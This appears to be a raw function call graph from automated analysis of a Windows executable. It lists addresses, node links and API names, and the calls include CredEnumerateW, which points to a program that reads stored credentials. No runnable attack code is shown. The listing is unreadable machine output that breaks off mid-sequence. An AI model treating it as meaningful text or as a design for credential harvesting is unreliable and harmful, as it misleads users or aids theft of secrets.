40144->40303 40146 43ad6c 40146->40107 40146->40144 40302 42370b memset memcpy memset 40146->40302 40148 43ae96 40307 42e1c0 147 API calls 40148->40307 40150 43adcc 40304 440f84 12 API calls 40150->40304 40153 43aea8 40154 43aec1 40153->40154 40308 42e199 147 API calls 40153->40308 40156 43af00 40154->40156 40309 42e1c0 147 API calls 40154->40309 40156->40107 40159 43af1a 40156->40159 40160 43b3d9 40156->40160 40310 438eed 16 API calls 40159->40310 40165 43b3f6 40160->40165 40172 43b4c8 40160->40172 40162 43b60f 40162->40107 40369 4393a5 17 API calls 40162->40369 40163 43af2f 40311 4233c5 16 API calls 40163->40311 40351 432878 12 API calls 40165->40351 40167 43af51 40312 423426 11 API calls 40167->40312 40170 43af7d 40313 423426 11 API calls 40170->40313 40171 43b4f2 40358 43a76c 21 API calls 40171->40358 40172->40171 40357 42bbd5 memcpy memcpy memcpy memset memcpy 40172->40357 40176 43b529 40359 44081d 163 API calls 40176->40359 40177 43af94 40314 423330 11 API calls 40177->40314 40181 43b47e 40185 43b497 40181->40185 40354 42374a memcpy memset memcpy memcpy memcpy 40181->40354 40182 43b544 40186 43b55c 40182->40186 40360 42c02e memset 40182->40360 40183 43b428 40204 43b462 40183->40204 40352 432b60 16 API calls 40183->40352 40184 43afca 40315 423330 11 API calls 40184->40315 40355 4233ae 11 API calls 40185->40355 40361 43a87a 163 API calls 40186->40361 40191 43afdb 40316 4233ae 11 API calls 40191->40316 40193 43b4b1 40356 423399 11 API calls 40193->40356 40195 43b56c 40205 43b58a 40195->40205 40362 423330 11 API calls 40195->40362 40197 43afee 40317 44081d 163 API calls 40197->40317 40199 43b4c1 40365 42db80 163 API calls 40199->40365 40203 43b592 40364 43a82f 16 API calls 40203->40364 40353 423330 11 API calls 40204->40353 40363 440f84 12 API calls 40205->40363 40208 43b5b4 40366 438c4e 163 API calls 40208->40366 40210 43b5cf 40367 42c02e memset 40210->40367 40212 43b005 40212->40107 40215 43b01f 40212->40215 40318 42d836 163 API calls 40212->40318 40213 43b1ef 40328 4233c5 16 API calls 40213->40328 40215->40213 40326 423330 11 API calls 40215->40326 40327 42d71d 163 API calls 40215->40327 40216 43b212 40329 423330 11 API calls 40216->40329 40219 43add4 40219->40162 40368 438f86 16 API calls 40219->40368 40222 43b087 40319 4233ae 11 API calls 40222->40319 40223 43b22a 40330 42ccb5 11 API calls 40223->40330 40226 43b10f 40322 423330 11 API calls 40226->40322 40227 43b23f 40331 4233ae 11 API calls 40227->40331 40229 43b257 40332 4233ae 11 API calls 40229->40332 40233 43b26e 40333 4233ae 11 API calls 40233->40333 40234 43b129 40323 4233ae 11 API calls 40234->40323 40237 43b09a 40237->40226 40320 42cc15 19 API calls 40237->40320 40321 4233ae 11 API calls 40237->40321 40238 43b282 40334 43a87a 163 API calls 40238->40334 40240 43b13c 40324 440f84 12 API calls 40240->40324 40242 43b29d 40335 423330 11 API calls 40242->40335 40245 43b15f 40325 4233ae 11 API calls 40245->40325 40246 43b2af 40248 43b2b8 40246->40248 40249 43b2ce 40246->40249 40336 4233ae 11 API calls 40248->40336 40337 440f84 12 API calls 40249->40337 40252 43b2c9 40339 4233ae 11 API calls 40252->40339 40253 43b2da 40338 42370b memset memcpy memset 40253->40338 40256 43b2f9 40340 423330 11 API calls 40256->40340 40258 43b30b 40341 423330 11 API calls 40258->40341 40260 43b325 40342 423399 11 API calls 40260->40342 40262 43b332 40343 4233ae 11 API calls 40262->40343 40264 43b354 40344 423399 11 API calls 40264->40344 40266 43b364 40345 43a82f 16 API calls 40266->40345 40268 43b370 40346 42db80 163 API calls 40268->40346 40270 43b380 40347 438c4e 163 API calls 40270->40347 40272 43b39e 40348 423399 11 API calls 40272->40348 40274 43b3ae 40349 43a76c 21 API calls 40274->40349 40276 43b3c3 40350 423399 11 API calls 40276->40350 40278->40099 40279->40102 40280->40100 40282 43a6f5 40281->40282 40283 43a765 40281->40283 40282->40283 40370 42a115 40282->40370 40283->40107 40290 4397fd memset 40283->40290 40287 43a73d 40287->40283 40288 42a115 147 API calls 40287->40288 40288->40283 40289->40109 40290->40116 40291->40107 40292->40131 40293->40120 40294->40124 40295->40121 40296->40125 40297->40129 40298->40133 40299->40135 40300->40139 40301->40146 40302->40144 40303->40150 40304->40219 40305->40142 40306->40148 40307->40153 40308->40154 40309->40154 40310->40163 40311->40167 40312->40170 40313->40177 40314->40184 40315->40191 40316->40197 40317->40212 40318->40222 40319->40237 40320->40237 40321->40237 40322->40234 40323->40240 40324->40245 40325->40215 40326->40215 40327->40215 40328->40216 40329->40223 40330->40227 40331->40229 40332->40233 40333->40238 40334->40242 40335->40246 40336->40252 40337->40253 40338->40252 40339->40256 40340->40258 40341->40260 40342->40262 40343->40264 40344->40266 40345->40268 40346->40270 40347->40272 40348->40274 40349->40276 40350->40219 40351->40183 40352->40204 40353->40181 40354->40185 40355->40193 40356->40199 40357->40171 40358->40176 40359->40182 40360->40186 40361->40195 40362->40205 40363->40203 40364->40199 40365->40208 40366->40210 40367->40219 40368->40162 40369->40107 40371 42a175 40370->40371 40373 42a122 40370->40373 40371->40283 40376 42b13b 147 API calls 40371->40376 40373->40371 40374 42a115 147 API calls 40373->40374 40377 43a174 40373->40377 40401 42a0a8 147 API calls 40373->40401 40374->40373 40376->40287 40391 43a196 40377->40391 40392 43a19e 40377->40392 40378 43a306 40378->40391 40414 4388c4 14 API calls 40378->40414 40381 42a115 147 API calls 40381->40392 40382 415a91 memset 40382->40392 40383 43a642 40383->40391 40418 4169a7 11 API calls 40383->40418 40385 4165ff 11 API calls 40385->40392 40387 43a635 40417 42c02e memset 40387->40417 40391->40373 40392->40378 40392->40381 40392->40382 40392->40385 40392->40391 40402 42ff8c 40392->40402 40410 439504 13 API calls 40392->40410 40411 4312d0 147 API calls 40392->40411 40412 42be4c memcpy memcpy memcpy memset memcpy 40392->40412 40413 43a121 11 API calls 40392->40413 40394 4169a7 11 API calls 40395 43a325 40394->40395 40395->40383 40395->40387 40395->40391 40395->40394 40396 42b5b5 memset memcpy 40395->40396 40397 42bf4c 14 API calls 40395->40397 40400 4165ff 11 API calls 40395->40400 40415 42b63e 14 API calls 40395->40415 40416 42bfcf memcpy 40395->40416 40396->40395 40397->40395 40400->40395 40401->40373 40403 43817e 139 API calls 40402->40403 40404 42ff99 40403->40404 40405 42ffe3 40404->40405 40406 42ffd0 40404->40406 40409 42ff9d 40404->40409 40420 4169a7 11 API calls 40405->40420 40419 4169a7 11 API calls 40406->40419 40409->40392 40410->40392 40411->40392 40412->40392 40413->40392 40414->40395 40415->40395 40416->40395 40417->40383 40418->40391 40419->40409 40420->40409 37680 41276d 37681 41277d 37680->37681 37723 4044a4 LoadLibraryW 37681->37723 37683 412785 37715 412789 37683->37715 37731 414b81 37683->37731 37686 4127c8 37737 412465 memset ??2@YAPAXI 37686->37737 37688 4127ea 37749 40ac21 37688->37749 37693 412813 37767 40dd07 memset 37693->37767 37694 412827 37772 40db69 memset 37694->37772 37697 412822 37793 4125b6 ??3@YAXPAX 37697->37793 37699 40ada2 _wcsicmp 37700 41283d 37699->37700 37700->37697 37703 412863 CoInitialize 37700->37703 37777 41268e 37700->37777 37797 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37703->37797 37707 41296f 37799 40b633 37707->37799 37709 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37714 412957 CoUninitialize 37709->37714 37720 4128ca 37709->37720 37714->37697 37716 4128d0 TranslateAcceleratorW 37717 412941 GetMessageW 37716->37717 37716->37720 37717->37714 37717->37716 37718 412909 IsDialogMessageW 37718->37717 37718->37720 37719 4128fd IsDialogMessageW 37719->37717 37719->37718 37720->37716 37720->37718 37720->37719 37721 41292b TranslateMessage DispatchMessageW 37720->37721 37722 41291f IsDialogMessageW 37720->37722 37721->37717 37722->37717 37722->37721 37724 4044cf GetProcAddress 37723->37724 37728 4044f7 37723->37728 37725 4044e8 FreeLibrary 37724->37725 37726 4044df 37724->37726 37727 4044f3 37725->37727 37725->37728 37726->37725 37727->37728 37729 404507 MessageBoxW 37728->37729 37730 40451e 37728->37730 37729->37683 37730->37683 37732 414b8a 37731->37732 37733 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37731->37733 37803 40a804 memset 37732->37803 37733->37686 37736 414b9e GetProcAddress 37736->37733 37738 4124e0 37737->37738 37739 412505 ??2@YAPAXI 37738->37739 37740 41251c 37739->37740 37742 412521 37739->37742 37825 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37740->37825 37814 444722 37742->37814 37748 41259b wcscpy 37748->37688 37830 40b1ab free free 37749->37830 37751 40ad76 37831 40aa04 37751->37831 37754 40a9ce malloc memcpy free free 37757 40ac5c 37754->37757 37755 40ad4b 37755->37751 37854 40a9ce 37755->37854 37757->37751 37757->37754 37757->37755 37758 40ace7 free 37757->37758 37834 40a8d0 37757->37834 37846 4099f4 37757->37846 37758->37757 37762 40a8d0 7 API calls 37762->37751 37763 40ada2 37764 40adc9 37763->37764 37765 40adaa 37763->37765 37764->37693 37764->37694 37765->37764 37766 40adb3 _wcsicmp 37765->37766 37766->37764 37766->37765 37859 40dce0 37767->37859 37769 40dd3a GetModuleHandleW 37864 40dba7 37769->37864 37773 40dce0 3 API calls 37772->37773 37774 40db99 37773->37774 37936 40dae1 37774->37936 37950 402f3a 37777->37950 37779 412766 37779->37697 37779->37703 37780 4126d3 _wcsicmp 37781 4126a8 37780->37781 37781->37779 37781->37780 37783 41270a 37781->37783 37984 4125f8 7 API calls 37781->37984 37783->37779 37953 411ac5 37783->37953 37794 4125da 37793->37794 37795 4125f0 37794->37795 37796 4125e6 DeleteObject 37794->37796 37798 40b1ab free free 37795->37798 37796->37795 37797->37709 37798->37707 37800 40b640 37799->37800 37801 40b639 free 37799->37801 37802 40b1ab free free 37800->37802 37801->37800 37802->37715 37804 40a83b GetSystemDirectoryW 37803->37804 37805 40a84c wcscpy 37803->37805 37804->37805 37810 409719 wcslen 37805->37810 37808 40a881 LoadLibraryW 37809 40a886 37808->37809 37809->37733 37809->37736 37811 409724 37810->37811 37812 409739 wcscat LoadLibraryW 37810->37812 37811->37812 37813 40972c wcscat 37811->37813 37812->37808 37812->37809 37813->37812 37815 444732 37814->37815 37816 444728 DeleteObject 37814->37816 37826 409cc3 37815->37826 37816->37815 37818 412551 37819 4010f9 37818->37819 37820 401130 37819->37820 37821 401134 GetModuleHandleW LoadIconW 37820->37821 37822 401107 wcsncat 37820->37822 37823 40a7be 37821->37823 37822->37820 37824 40a7d2 37823->37824 37824->37748 37824->37824 37825->37742 37829 409bfd memset wcscpy 37826->37829 37828 409cdb CreateFontIndirectW 37828->37818 37829->37828 37830->37757 37832 40aa14 37831->37832 37833 40aa0a free 37831->37833 37832->37763 37833->37832 37835 40a8eb 37834->37835 37836 40a8df wcslen 37834->37836 37837 40a906 free 37835->37837 37838 40a90f 37835->37838 37836->37835 37839 40a919 37837->37839 37840 4099f4 3 API calls 37838->37840 37841 40a932 37839->37841 37842 40a929 free 37839->37842 37840->37839 37844 4099f4 3 API calls 37841->37844 37843 40a93e memcpy 37842->37843 37843->37757 37845 40a93d 37844->37845 37845->37843 37847 409a41 37846->37847 37848 4099fb malloc 37846->37848 37847->37757 37850 409a37 37848->37850 37851 409a1c 37848->37851 37850->37757 37852 409a30 free 37851->37852 37853 409a20 memcpy 37851->37853 37852->37850 37853->37852 37855 40a9e7 37854->37855 37856 40a9dc free 37854->37856 37858 4099f4 3 API calls 37855->37858 37857 40a9f2 37856->37857 37857->37762 37858->37857 37883 409bca GetModuleFileNameW 37859->37883 37861 40dce6 wcsrchr 37862 40dcf5 37861->37862 37863 40dcf9 wcscat 37861->37863 37862->37863 37863->37769 37884 44db70 37864->37884 37868 40dbfd 37887 4447d9 37868->37887 37871 40dc34 wcscpy wcscpy 37913 40d6f5 37871->37913 37872 40dc1f wcscpy 37872->37871 37875 40d6f5 3 API calls 37876 40dc73 37875->37876 37877 40d6f5 3 API calls 37876->37877 37878 40dc89 37877->37878 37879 40d6f5 3 API calls 37878->37879 37880 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37879->37880 37919 40da80 37880->37919 37883->37861 37885 40dbb4 memset memset 37884->37885 37886 409bca GetModuleFileNameW 37885->37886 37886->37868 37889 4447f4 37887->37889 37888 40dc1b 37888->37871 37888->37872 37889->37888 37890 444807 ??2@YAPAXI 37889->37890 37891 44481f 37890->37891 37892 444873 _snwprintf 37891->37892 37893 4448ab wcscpy 37891->37893 37926 44474a 8 API calls 37892->37926 37895 4448bb 37893->37895 37927 44474a 8 API calls 37895->37927 37896 4448a7 37896->37893 37896->37895 37898 4448cd 37928 44474a 8 API calls 37898->37928 37900 4448e2 37929 44474a 8 API calls 37900->37929 37902 4448f7 37930 44474a 8 API calls 37902->37930 37904 44490c 37931 44474a 8 API calls 37904->37931 37906 444921 37932 44474a 8 API calls 37906->37932 37908 444936 37933 44474a 8 API calls 37908->37933 37910 44494b 37934 44474a 8 API calls 37910->37934 37912 444960 ??3@YAXPAX 37912->37888 37914 44db70 37913->37914 37915 40d702 memset GetPrivateProfileStringW 37914->37915 37916 40d752 37915->37916 37917 40d75c WritePrivateProfileStringW 37915->37917 37916->37917 37918 40d758 37916->37918 37917->37918 37918->37875 37920 44db70 37919->37920 37921 40da8d memset 37920->37921 37922 40daac LoadStringW 37921->37922 37923 40dac6 37922->37923 37923->37922 37925 40dade 37923->37925 37935 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37923->37935 37925->37697 37926->37896 37927->37898 37928->37900 37929->37902 37930->37904 37931->37906 37932->37908 37933->37910 37934->37912 37935->37923 37946 409b98 GetFileAttributesW 37936->37946 37938 40daea 37939 40db63 37938->37939 37940 40daef wcscpy wcscpy GetPrivateProfileIntW 37938->37940 37939->37699 37947 40d65d GetPrivateProfileStringW 37940->37947 37942 40db3e 37948 40d65d GetPrivateProfileStringW 37942->37948 37944 40db4f 37949 40d65d GetPrivateProfileStringW 37944->37949 37946->37938 37947->37942 37948->37944 37949->37939 37985 40eaff 37950->37985 37954 411ae2 memset 37953->37954 37955 411b8f 37953->37955 38025 409bca GetModuleFileNameW 37954->38025 37967 411a8b 37955->37967 37957 411b0a wcsrchr 37958 411b22 wcscat 37957->37958 37959 411b1f 37957->37959 38026 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37958->38026 37959->37958 37961 411b67 38027 402afb 37961->38027 37965 411b7f 38083 40ea13 SendMessageW memset SendMessageW 37965->38083 37968 402afb 27 API calls 37967->37968 37969 411ac0 37968->37969 37970 4110dc 37969->37970 37971 41113e 37970->37971 37976 4110f0 37970->37976 38108 40969c LoadCursorW SetCursor 37971->38108 37973 411143 38109 4032b4 37973->38109 38127 444a54 37973->38127 37974 4110f7 _wcsicmp 37974->37976 37975 411157 37977 40ada2 _wcsicmp 37975->37977 37976->37971 37976->37974 38130 410c46 10 API calls 37976->38130 37980 411167 37977->37980 37978 4111af 37980->37978 37981 4111a6 qsort 37980->37981 37981->37978 37984->37781 37986 40eb10 37985->37986 37998 40e8e0 37986->37998 37989 40eb6c memcpy memcpy 37990 40ebb7 37989->37990 37990->37989 37991 40ebf2 ??2@YAPAXI ??2@YAPAXI 37990->37991 37993 40d134 16 API calls 37990->37993 37992 40ec2e ??2@YAPAXI 37991->37992 37996 40ec65 37991->37996 37992->37996 37993->37990 37996->37996 38008 40ea7f 37996->38008 37997 402f49 37997->37781 37999 40e8f2 37998->37999 38000 40e8eb ??3@YAXPAX 37998->38000 38001 40e900 37999->38001 38002 40e8f9 ??3@YAXPAX 37999->38002 38000->37999 38003 40e911 38001->38003 38004 40e90a ??3@YAXPAX 38001->38004 38002->38001 38005 40e931 ??2@YAPAXI ??2@YAPAXI 38003->38005 38006 40e921 ??3@YAXPAX 38003->38006 38007 40e92a ??3@YAXPAX 38003->38007 38004->38003 38005->37989 38006->38007 38007->38005 38009 40aa04 free 38008->38009 38010 40ea88 38009->38010 38011 40aa04 free 38010->38011 38012 40ea90 38011->38012 38013 40aa04 free 38012->38013 38014 40ea98 38013->38014 38015 40aa04 free 38014->38015 38016 40eaa0 38015->38016 38017 40a9ce 4 API calls 38016->38017 38018 40eab3 38017->38018 38019 40a9ce 4 API calls 38018->38019 38020 40eabd 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eac7 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40ead1 38023->38024 38024->37997 38025->37957 38026->37961 38084 40b2cc 38027->38084 38029 402b0a 38030 40b2cc 27 API calls 38029->38030 38031 402b23 38030->38031 38032 40b2cc 27 API calls 38031->38032 38033 402b3a 38032->38033 38034 40b2cc 27 API calls 38033->38034 38035 402b54 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b6b 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b82 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b99 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402bb0 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402bc7 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bde 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bf5 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402c0c 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402c23 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c3a 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c51 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c68 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c7f 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c99 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402cb3 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402cd5 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402cf0 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402d0b 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402d26 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d3e 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d59 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d78 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d93 38080->38081 38082 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38081->38082 38082->37965 38083->37955 38087 40b58d 38084->38087 38086 40b2d1 38086->38029 38088 40b5a4 GetModuleHandleW FindResourceW 38087->38088 38089 40b62e 38087->38089 38090 40b5c2 LoadResource 38088->38090 38092 40b5e7 38088->38092 38089->38086 38091 40b5d0 SizeofResource LockResource 38090->38091 38090->38092 38091->38092 38092->38089 38100 40afcf 38092->38100 38094 40b608 memcpy 38103 40b4d3 memcpy 38094->38103 38096 40b61e 38104 40b3c1 18 API calls 38096->38104 38098 40b626 38105 40b04b 38098->38105 38101 40b04b ??3@YAXPAX 38100->38101 38102 40afd7 ??2@YAPAXI 38101->38102 38102->38094 38103->38096 38104->38098 38106 40b051 ??3@YAXPAX 38105->38106 38107 40b05f 38105->38107 38106->38107 38107->38089 38108->37973 38110 4032c4 38109->38110 38111 40b633 free 38110->38111 38112 403316 38111->38112 38131 44553b 38112->38131 38116 403480 38329 40368c 15 API calls 38116->38329 38118 403489 38119 40b633 free 38118->38119 38120 403495 38119->38120 38120->37975 38121 4033a9 memset memcpy 38122 4033ec wcscmp 38121->38122 38123 40333c 38121->38123 38122->38123 38123->38116 38123->38121 38123->38122 38327 4028e7 11 API calls 38123->38327 38328 40f508 6 API calls 38123->38328 38125 403421 _wcsicmp 38125->38123 38128 444a64 FreeLibrary 38127->38128 38129 444a83 38127->38129 38128->38129 38129->37975 38130->37976 38132 445548 38131->38132 38133 445599 38132->38133 38330 40c768 38132->38330 38134 4455a8 memset 38133->38134 38146 4457f2 38133->38146 38413 403988 38134->38413 38141 4458aa 38143 44594a 38141->38143 38144 4458bb memset memset 38141->38144 38142 445672 38424 403fbe memset memset memset memset memset 38142->38424 38148 4459ed 38143->38148 38149 44595e memset memset 38143->38149 38151 414c2e 17 API calls 38144->38151 38153 445854 38146->38153 38515 403e2d memset memset memset memset memset 38146->38515 38156 445a00 memset memset 38148->38156 38157 445b22 38148->38157 38158 414c2e 17 API calls 38149->38158 38150 4455e5 38150->38142 38161 44560f 38150->38161 38159 4458f9 38151->38159 38152 44557a 38154 44558c 38152->38154 38611 4136c0 CoTaskMemFree 38152->38611 38153->38141 38538 403c9c memset memset memset memset memset 38153->38538 38397 444b06 38154->38397 38561 414c2e 38156->38561 38164 445bca 38157->38164 38165 445b38 memset memset memset 38157->38165 38169 44599c 38158->38169 38160 40b2cc 27 API calls 38159->38160 38170 445909 38160->38170 38172 4087b3 338 API calls 38161->38172 38163 445849 38627 40b1ab free free 38163->38627 38171 445c8b memset memset 38164->38171 38228 445cf0 38164->38228 38175 445bd4 38165->38175 38176 445b98 38165->38176 38179 40b2cc 27 API calls 38169->38179 38188 409d1f 6 API calls 38170->38188 38180 414c2e 17 API calls 38171->38180 38189 445621 38172->38189 38173 445585 38612 41366b FreeLibrary 38173->38612 38174 44589f 38628 40b1ab free free 38174->38628 38186 414c2e 17 API calls 38175->38186 38176->38175 38182 445ba2 38176->38182 38191 4459ac 38179->38191 38192 445cc9 38180->38192 38700 4099c6 wcslen 38182->38700 38183 4456b2 38615 40b1ab free free 38183->38615 38185 40b2cc 27 API calls 38195 445a4f 38185->38195 38197 445be2 38186->38197 38187 403335 38326 4452e5 45 API calls 38187->38326 38200 445919 38188->38200 38613 4454bf 20 API calls 38189->38613 38190 445823 38190->38163 38209 4087b3 338 API calls 38190->38209 38201 409d1f 6 API calls 38191->38201 38203 409d1f 6 API calls 38192->38203 38193 445879 38193->38174 38213 4087b3 338 API calls 38193->38213 38577 409d1f wcslen wcslen 38195->38577 38207 40b2cc 27 API calls 38197->38207 38198 445d3d 38226 40b2cc 27 API calls 38198->38226 38199 445d88 memset memset memset 38210 414c2e 17 API calls 38199->38210 38629 409b98 GetFileAttributesW 38200->38629 38202 4459bc 38201->38202 38696 409b98 GetFileAttributesW 38202->38696 38212 445ce1 38203->38212 38204 445bb3 38703 445403 memset 38204->38703 38205 445680 38205->38183 38447 4087b3 memset 38205->38447 38216 445bf3 38207->38216 38209->38190 38219 445dde 38210->38219 38720 409b98 GetFileAttributesW 38212->38720 38213->38193 38225 409d1f 6 API calls 38216->38225 38217 445928 38217->38143 38630 40b6ef 38217->38630 38227 40b2cc 27 API calls 38219->38227 38220 4459cb 38220->38148 38237 40b6ef 253 API calls 38220->38237 38224 40b2cc 27 API calls 38230 445a94 38224->38230 38232 445c07 38225->38232 38233 445d54 _wcsicmp 38226->38233 38236 445def 38227->38236 38228->38187 38228->38198 38228->38199 38229 445389 259 API calls 38229->38164 38582 40ae18 38230->38582 38231 44566d 38231->38146 38498 413d4c 38231->38498 38240 445389 259 API calls 38232->38240 38241 445d71 38233->38241 38303 445d67 38233->38303 38235 445665 38614 40b1ab free free 38235->38614 38242 409d1f 6 API calls 38236->38242 38237->38148 38245 445c17 38240->38245 38721 445093 23 API calls 38241->38721 38248 445e03 38242->38248 38244 4456d8 38250 40b2cc 27 API calls 38244->38250 38251 40b2cc 27 API calls 38245->38251 38247 44563c 38247->38235 38253 4087b3 338 API calls 38247->38253 38722 409b98 GetFileAttributesW 38248->38722 38249 40b6ef 253 API calls 38249->38187 38256 4456e2 38250->38256 38257 445c23 38251->38257 38252 445d83 38252->38187 38253->38247 38255 445e12 38261 445e6b 38255->38261 38265 40b2cc 27 API calls 38255->38265 38616 413fa6 _wcsicmp _wcsicmp 38256->38616 38260 409d1f 6 API calls 38257->38260 38263 445c37 38260->38263 38724 445093 23 API calls 38261->38724 38262 4456eb 38268 4456fd memset memset memset memset 38262->38268 38269 4457ea 38262->38269 38270 445389 259 API calls 38263->38270 38264 445b17 38697 40aebe 38264->38697 38272 445e33 38265->38272 38617 409c70 wcscpy wcsrchr 38268->38617 38620 413d29 38269->38620 38276 445c47 38270->38276 38277 409d1f 6 API calls 38272->38277 38274 445e7e 38278 445f67 38274->38278 38281 40b2cc 27 API calls 38276->38281 38282 445e47 38277->38282 38283 40b2cc 27 API calls 38278->38283 38279 445ab2 memset 38284 40b2cc 27 API calls 38279->38284 38286 445c53 38281->38286 38723 409b98 GetFileAttributesW 38282->38723 38288 445f73 38283->38288 38289 445aa1 38284->38289 38285 409c70 2 API calls 38290 44577e 38285->38290 38291 409d1f 6 API calls 38286->38291 38293 409d1f 6 API calls 38288->38293 38289->38264 38289->38279 38294 409d1f 6 API calls 38289->38294 38589 40add4 38289->38589 38594 445389 38289->38594 38603 40ae51 38289->38603 38295 409c70 2 API calls 38290->38295 38296 445c67 38291->38296 38292 445e56 38292->38261 38300 445e83 memset 38292->38300 38297 445f87 38293->38297 38294->38289 38298 44578d 38295->38298 38299 445389 259 API calls 38296->38299 38727 409b98 GetFileAttributesW 38297->38727 38298->38269 38305 40b2cc 27 API calls 38298->38305 38299->38164 38304 40b2cc 27 API calls 38300->38304 38303->38187 38303->38249 38307 445eab 38304->38307 38306 4457a8 38305->38306 38308 409d1f 6 API calls 38306->38308 38309 409d1f 6 API calls 38307->38309 38310 4457b8 38308->38310 38311 445ebf 38309->38311 38619 409b98 GetFileAttributesW 38310->38619 38313 40ae18 9 API calls 38311->38313 38321 445ef5 38313->38321 38314 4457c7 38314->38269 38316 4087b3 338 API calls 38314->38316 38315 40ae51 9 API calls 38315->38321 38316->38269 38317 445f5c 38318 40aebe FindClose 38317->38318 38318->38278 38319 40add4 2 API calls 38319->38321 38320 40b2cc 27 API calls 38320->38321 38321->38315 38321->38317 38321->38319 38321->38320 38322 409d1f 6 API calls 38321->38322 38324 445f3a 38321->38324 38725 409b98 GetFileAttributesW 38321->38725 38322->38321 38726 445093 23 API calls 38324->38726 38326->38123 38327->38125 38328->38123 38329->38118 38331 40c775 38330->38331 38728 40b1ab free free 38331->38728 38333 40c788 38729 40b1ab free free 38333->38729 38335 40c790 38730 40b1ab free free 38335->38730 38337 40c798 38338 40aa04 free 38337->38338 38339 40c7a0 38338->38339 38731 40c274 memset 38339->38731 38344 40a8ab 9 API calls 38345 40c7c3 38344->38345 38346 40a8ab 9 API calls 38345->38346 38347 40c7d0 38346->38347 38760 40c3c3 38347->38760 38351 40c877 38360 40bdb0 38351->38360 38352 40c86c 38802 4053fe 39 API calls 38352->38802 38358 40c7e5 38358->38351 38358->38352 38359 40c634 50 API calls 38358->38359 38785 40a706 38358->38785 38359->38358 39031 404363 38360->39031 38364 40bdee 38367 40b2cc 27 API calls 38364->38367 38369 40bf5d 38364->38369 38365 40bddf CredEnumerateW 38365->38364 38368 40be02 wcslen 38367->38368 38368->38369 38377 40be1e 38368->38377 39051 40440c 38369->39051 38370 40be26 wcsncmp 38370->38377 38373 40be7d memset 38374 40bea7 memcpy 38373->38374 38373->38377 38375 40bf11 wcschr 38374->38375 38374->38377 38375->38377 38376 40b2cc 27 API calls 38378 40bef6 _wcsnicmp 38376->38378 38377->38369 38377->38370 38377->38373 38377->38374 38377->38375 38377->38376 38379 40bf43 LocalFree 38377->38379 39054 40bd5d 28 API calls 38377->39054 39055 404423 38377->39055 38378->38375 38378->38377 38379->38377 38380 4135f7 39070 4135e0 38380->39070 38383 40b2cc 27 API calls 38384 41360d 38383->38384 38385 40a804 8 API calls 38384->38385 38386 413613 38385->38386 38387 41361b 38386->38387 38388 41363e 38386->38388 38389 40b273 27 API calls 38387->38389 38390 4135e0 FreeLibrary 38388->38390 38391 413625 GetProcAddress 38389->38391 38392 413643 38390->38392 38391->38388 38393 413648 38391->38393 38392->38152 38394 413658 38393->38394 38395 4135e0 FreeLibrary 38393->38395 38394->38152 38396 413666 38395->38396 38396->38152 39073 4449b9 38397->39073 38400 444c1f 38400->38133 38401 4449b9 42 API calls 38403 444b4b 38401->38403 38402 444c15 38405 4449b9 42 API calls 38402->38405 38403->38402 39094 444972 GetVersionExW 38403->39094 38405->38400 38406 444b99 memcmp 38411 444b8c 38406->38411 38407 444c0b 39098 444a85 42 API calls 38407->39098 38411->38406 38411->38407 39095 444aa5 42 API calls 38411->39095 39096 40a7a0 GetVersionExW 38411->39096 39097 444a85 42 API calls 38411->39097 38414 40399d 38413->38414 39099 403a16 38414->39099 38417 403a12 wcsrchr 38417->38150 38418 4039a3 38421 4039f4 38418->38421 38423 403a09 38418->38423 39110 40a02c CreateFileW 38418->39110 38422 4099c6 2 API calls 38421->38422 38421->38423 38422->38423 39113 40b1ab free free 38423->39113 38425 414c2e 17 API calls 38424->38425 38426 404048 38425->38426 38427 414c2e 17 API calls 38426->38427 38428 404056 38427->38428 38429 409d1f 6 API calls 38428->38429 38430 404073 38429->38430 38431 409d1f 6 API calls 38430->38431 38432 40408e 38431->38432 38433 409d1f 6 API calls 38432->38433 38434 4040a6 38433->38434 38435 403af5 20 API calls 38434->38435 38436 4040ba 38435->38436 38437 403af5 20 API calls 38436->38437 38438 4040cb 38437->38438 39140 40414f memset 38438->39140 38440 404140 39154 40b1ab free free 38440->39154 38442 4040ec memset 38445 4040e0 38442->38445 38443 404148 38443->38205 38444 4099c6 2 API calls 38444->38445 38445->38440 38445->38442 38445->38444 38446 40a8ab 9 API calls 38445->38446 38446->38445 39167 40a6e6 WideCharToMultiByte 38447->39167 38449 4087ed 39168 4095d9 memset 38449->39168 38452 408809 memset memset memset memset memset 38453 40b2cc 27 API calls 38452->38453 38454 4088a1 38453->38454 38455 409d1f 6 API calls 38454->38455 38456 4088b1 38455->38456 38457 40b2cc 27 API calls 38456->38457 38458 4088c0 38457->38458 